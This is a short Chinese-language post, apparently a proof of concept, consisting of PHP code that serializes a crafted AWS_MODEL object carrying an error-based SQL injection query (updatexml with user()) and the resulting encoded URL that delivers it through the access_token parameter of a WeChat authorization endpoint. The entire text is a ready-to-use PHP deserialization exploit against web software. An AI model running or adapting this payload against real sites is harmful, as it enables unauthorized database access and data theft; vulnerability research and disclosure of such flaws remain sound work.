代码:
<?php
class AWS_MODEL {
private $_shutdown_query;
function __construct()
{
$this->_shutdown_query = [
"SELECT updatexml(1,concat(0xa,user()),1)"
];
}
}
$arr = [
'errcode' => 1,
new AWS_MODEL()
];
echo urlencode(base64_encode(serialize($arr)));
?>生成出来的POC:
?/m/weixin/authorization/&state=OAUTH&access_token=YToyOntzOjc6ImVycmNvZGUiO2k6MTtpOjA7Tzo5OiJBV1NfTU9ERUwiOjE6e3M6MjY6IgBBV1NfTU9ERUwAX3NodXRkb3duX3F1ZXJ5IjthOjE6e2k6MDtzOjQwOiJTRUxFQ1QgdXBkYXRleG1sKDEsY29uY2F0KDB4YSx1c2VyKCkpLDEpIjt9fX0%3D
评论回复